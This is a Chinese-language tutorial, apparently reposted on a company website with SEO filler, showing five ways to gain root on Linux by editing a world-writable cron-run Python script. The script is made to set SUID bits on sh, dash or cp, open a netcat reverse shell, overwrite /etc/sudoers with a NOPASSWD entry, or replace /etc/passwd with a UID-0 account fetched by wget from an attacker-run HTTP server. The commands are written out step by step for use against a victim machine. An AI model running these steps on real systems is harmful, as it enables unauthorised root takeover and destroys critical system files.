在Linux上通过可写文件获取Root权限的多种方式

在Linux中,一切都可以看做文件,包括所有允许/禁止读写执行权限的目录和设备。当管理员为任何文件设置权限时,都应清楚并合理为每个Linux用户分配应有的读写执行权限。在本文中我将为大家展示,如何利用Linux中具有写入权限的文件/脚本来进行提权操作。好了,话不多说。下面就进入我们的正题吧!

成都创新互联公司专注于贡井网站建设服务及定制,我们拥有丰富的企业做网站经验。 热诚为您提供贡井营销型网站建设,贡井网站制作、贡井网页设计、贡井网站官网定制、小程序设计服务,打造贡井网络公司原创品牌,更为您提供贡井网站排名全网营销落地服务。

首先,我们来启动我们的攻击机并渗透进目标系统直至提权阶段。这里假设我通过ssh成功登录到了受害者机器,并访问了非root用户的终端。通过以下命令,我们可以枚举所有具有可写权限的二进制文件。

 
 
 
      
  
  
  1. find / -writable -type  f 2>/dev/null | grep -v "/proc/" 
    2.

可以看到在/lib/log路径下有一个python文件,我们进入到该目录并查看该文件的权限为777

通过cat命令查看该文件内容,这是管理员添加的一个用来清除 /tmp中的所有垃圾文件的脚本,具体执行取决于管理员设置的定时间隔。获取了这些信息后,攻击者可以通过以下方式来执行提权操作。

方法1

我们复制了/bin/sh到/tmp下并为/tmp/sh启用了SUID。使用编辑器打开sanitizer.py并将 “rm -r /tmp/*” 中的内容替换为以下两行:

 
 
 
      
  
  
  1. os.system('cp /bin/sh /tmp/sh') 
    2.   
  
  
  2. os.system('chmod u+s /tmp/sh') 
    3.

一段时间后,它将在/tmp目录内创建一个具有SUID权限的sh文件,当你运行它时,你将会获取root访问权限。

 
 
 
      
  
  
  1. cd /tmp 
    2.   
  
  
  2. ls 
    3.   
  
  
  3. ./sh 
    4.   
  
  
  4. id 
    5.   
  
  
  5. whoami 
    6.

下图可以说明一切!

方法2

同样,你也可以将 “rm -r /tmp/*” 替换为以下内容:

 
 
 
      
  
  
  1. os.system(‘chmod u+s /bin/dash) 
    2.

一段时间后,它将为/bin/dash设置SUID权限,并且在运行时会给予root访问权限。

 
 
 
      
  
  
  1. /bin/dash 
    2.   
  
  
  2. id 
    3.   
  
  
  3. whoami 
    4.

如下图所示:

方法3

在这种方法中,我们在 rm -r /tmp/* 的位置粘贴了python反向shell连接代码,并在新的终端中启动了netcat侦听。

如上所述,经过一段时间后,我们通过netcat获取了具有root访问权限的反向shell。

 
 
 
      
  
  
  1. nc -lvp 1234 
    2.   
  
  
  2. id 
    3.   
  
  
  3. whoami 
    4.

如下图所示:

方法4

这个方法挺有意思的,在下图中大家可以看到我当前的用户是没有执行sudo命令的权限的。那我们就想办法让自己成为suoders文件成员。

同样,我们将 “rm -r /tmp/*” 替换为以下内容:

 
 
 
      
  
  
  1. os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers') 
    2.

过一段时间后,当你输入“sudo -l”命令时,你会注意到,它已成为了sudo用户的成员。此时我们只要输入“sudo bash”就可以获取root访问权限。

 
 
 
      
  
  
  1. sudo -l 
    2.   
  
  
  2. sudo bash 
    3.   
  
  
  3. id 
    4.

方法5

我们知道passwd在任何类linux的系统中都扮演着非常重要的角色,一旦攻击者有机会可以修改此文件,那么它将会成为一种特权提升的动态方式。

同样,我们也不会忽视这一点,使用cat命令读取etc/passwd文件。

在这里你可以观察到用户名为nemo记录的高亮条目,根据我的猜测UID:1000 & GID:1000表示它应该是管理员组的成员。

但我们的目标是通过编辑nemo记录,使其成为root组的成员。因此,我们选择并复制etc/passwd文件内的所有记录,然后将它粘贴到一个空的文本文件中。

然后在一个新的终端中使用openssl生成一个加盐密码并复制。

 
 
 
      
  
  
  1. openssl passwd -1 -salt abc 123 
    2.

现在将上面复制的加盐密码粘贴至用户nemo记录条目中的“X”处,并且将UID&GID更改为0,如图所示。操作完成后,将文本文件保存为“passwd”,将该文件传输至目标系统,它将覆盖原始passwd文件的内容。

 
 
 
      
  
  
  1. cd Desktop 
    2.   
  
  
  2. python -m SimpleHTTPServer 80 
    3.

同样,将 “rm -r /tmp/*” 替换为以下内容:

 
 
 
      
  
  
  1. os.system(‘chmod u+s /bin/cp) 
    2.

一段时间后,它会启用/bin/cp的SUID位以复制任意文件。

现在将被你修改过的passwd文件下载至目标系统的/tmp目录中。让我们来检查一下/bin/cp是否启用了SUID位,然后使用cp命令将修改的passwd文件复制到/etc/passwd中,这将覆盖原始passwd文件的内容。

 
 
 
      
  
  
  1. cd /tmp 
    2.   
  
  
  2. wget http://192.168.1.103/passwd 
    3.   
  
  
  3. ls -al /bin/cp 
    4.   
  
  
  4. cp passwd /etc/passwd 
    5.

现在,我们键入以下命令查看修改内容是否已在passwd文件中生效。

 
 
 
      
  
  
  1. tail /etc/passwd 
    2.

可以看到修改内容已成功写入!

执行以下命令获取root访问权限:

 
 
 
      
  
  
  1. su nemo 
    2.   
  
  
  2. password 123 
    3.   
  
  
  3. whoami 
    4.

分享文章:在Linux上通过可写文件获取Root权限的多种方式
标题来源:http://www.shufengxianlan.com/qtweb/news32/494982.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

猜你还喜欢下面的内容

Google知识

同城分类信息

东电技服    企业网站制作    成都做网站建设公司    百度推广公司    成都服务器机柜租用    成都LED显示屏    网站建设公司    都江堰做网站    南宁旺客科技    和正兴机械    腾讯香港免备案空间    成都展柜厂    网站设计制作    成都企业网站定制    德阳网站建设    成都口碑营销公司    成都做手机网站    腾讯免备案空间    网站建设改版    力比特机械